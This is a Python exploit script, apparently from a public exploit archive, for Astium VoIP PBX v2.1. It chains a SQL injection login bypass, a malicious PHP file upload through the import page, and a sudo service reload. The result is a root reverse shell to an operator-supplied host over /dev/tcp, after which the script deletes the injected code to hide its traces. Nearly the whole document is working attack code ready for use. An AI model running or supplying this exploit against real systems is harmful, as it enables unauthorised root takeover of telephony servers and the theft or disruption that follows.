#!/usr/bin/python #+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Astium VoIP PBX <= v2.1 build 25399 Multiple Vulns Remote Root Exploit # Date : 01-02-2012 # Author : xistence (xistence<[AT]>0x90.nl) # Software link : http://www.oneip.nl/telefonie-oplossingen/ip-telefooncentrale/astium-downloaden-en-installeren/?lang=en # Vendor site : http://www.oneip.nl/ # Version : v2.1 build 25399 # Tested on : CentOS 5.x 32-bit # # Vulnerability : Astium is prone to multiple vulnerabilities. This exploit will use SQL injection to bypass authentication on the # login page and get access as an administrator. After that it will upload and execute a PHP script which will modify the # "/usr/local/astium/web/php/config.php" script with our reverse shell php code and run a # "sudo /sbin/service astcfgd reload" (Apache user is allowed to restart this service through sudo). # The service reload will cause the added code in "/usr/local/astium/web/php/config.php" to be executed as root and thus resulting in # a reverse shell with root privileges. # Code in "/usr/local/astium/web/php/config.php" is also removed again, else the web interface will stop functioning! # # Vendor has been contacted several times since 8-22-2011(!) and promised to fix the issue, but until now hasn't resolved the issue. # #+--------------------------------------------------------------------------------------------------------------------------------+ import urllib, urllib2, cookielib import sys import random import mimetools import mimetypes from cStringIO import StringIO import itertools print "[*] Astium VoIP PBX <= v2.1 build 25399 Multiple Vulns Remote Root Exploit - xistence - xistence[at]0x90[.]nl - 2013-01-02" if (len(sys.argv) != 4): print "[*] Usage: " + sys.argv[0] + " <RHOST> <LHOST> <LPORT>" exit(0) rhost = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] class MultiPartForm(object): """Accumulate the data to be used when posting a form.""" def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): """Add a simple field to the form data.""" self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): """Add a file to be uploaded.""" body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): """Return a string representing the form data, including attached files.""" # Build a list of lists, each containing "lines" of the # request. Each part is separated by a boundary string. # Once the list is built, return a string where each # line is separated by '\r\n'. parts = [] part_boundary = '--' + self.boundary # Add the form fields parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) # Add the files to upload parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) # Flatten the list and add closing boundary marker, # then return CR+LF separated data flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) # PHP script to write our reverse shell to the /usr/local/astium/web/php/config.php script. phpScript='''<?php $f = fopen("/usr/local/astium/web/php/config.php", "a"); fwrite($f, "\\n<?php system('/bin/bash -i >& /dev/tcp/%s/%s 0>&1'); ?>"); fclose($f); system("sudo /sbin/service astcfgd reload"); // Sleep 1 minute, so that we have enough time for the reload to trigger our reverse shell sleep(60); $lines = file('/usr/local/astium/web/php/config.php'); // Delete last 2 lines (containing our reverse shell) of the config.php file, else the web interface won't work anymore after our exploit. array_pop($lines); array_pop($lines); $file = join('', $lines); $file_handle = fopen('/usr/local/astium/web/php/config.php', 'w'); fputs($file_handle, $file); fclose($file_handle); ?>''' % (lhost, lport) # Create a random file with 8 characters filename = '' for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8): filename+=i filename +=".php" # Create the form with simple fields form = MultiPartForm() form.add_field('__act', 'submit') # Add a "fake" file, our simple PHP script. form.add_file('importcompany', filename, fileHandle=StringIO(phpScript)) # SQL Injection to bypass login SQLiAuthBypass = "system' OR 1='1" # Our Cookie Jar cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) print "[*] Opening index.php to get Cookies" # Just open the url to grab the cookies and put them in the jar resp = opener.open("http://%s/en/content/index.php" %rhost) print "[*] Sending evil SQLi authentication bypass payload" # Set our post parameters and bypass the logon.php with our SQL Injection post_params = urllib.urlencode({'__act' : 'submit', 'user_name' : SQLiAuthBypass, 'pass_word' : 'pwned', 'submit' : 'Login'}) resp = opener.open("http://%s/en/logon.php" %rhost, post_params) print "[*] Uploading PHP script " + filename + " to inject PHP code in '/usr/local/astium/web/php/config.php' and run a 'sudo /sbin/service astcfgd reload' to create a reverse shell" # Create our multi-part body + headers file upload request resp = urllib2.Request("http://%s/en/database/import.php" % rhost) body = str(form) resp.add_header('Content-type', form.get_content_type()) resp.add_header('Content-length', len(body)) resp.add_data(body) request = opener.open(resp).read() print "[*] Executing remote PHP script. Check your netcat shell. NOTE: this can take up to 1-2 minutes before it spawns a shell\n" # Simple GET request to execute the script on the remote server resp = opener.open("http://%s/upload/%s" % (rhost, filename))